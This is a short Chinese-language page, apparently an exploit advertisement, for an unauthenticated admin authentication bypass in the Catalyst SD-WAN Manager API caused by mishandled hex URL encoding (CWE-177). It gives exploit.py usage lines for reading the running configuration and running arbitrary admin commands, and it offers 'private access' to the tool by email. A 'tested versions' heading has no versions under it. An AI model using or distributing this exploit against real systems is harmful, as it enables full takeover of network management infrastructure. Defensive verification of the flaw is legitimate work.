EUVD-2026-89950 URL 编码(十六进制编码)处理不当 (CWE-177)
由于 API 会话管理层对 URL 编码处理不当(CWE-177),导致未认证的认证绕过。 精心构造的请求可到达特权端点,并被当作已认证的管理员会话处理。
该漏洞允许远程未认证攻击者绕过 Catalyst SD-WAN Manager API 上的预期访问控制。一旦绕过成功,攻击者便拥有完整的管理员权限,可以读取配置、修改系统状态或下发管理命令。
已在以下版本上测试并确认可利用:
URI 解码的执行方式不一致。某些十六进制编码序列会被请求路由器接受,但在进行认证判定之前未被规范化。因此,针对目标 API 路径的会话验证逻辑被跳过。
python3 exploit.py --target https://manager.example.com --cmd "show running-config"
# 仅验证
python3 exploit.py --target https://manager.example.com --check
# 任意管理员操作
python3 exploit.py --target https://manager.example.com --cmd "request nms all"
支持的选项:
--target / -t
--cmd / -c
--check
--proxy
-v
如需私有访问权限,请联系我们:[email protected]
能力
实用价值 可用于对漏洞进行受控验证、检测工程,以及确认所应用的补丁是否确实阻止了该编码路径。
报告与 PoC:ShadowForge Cyber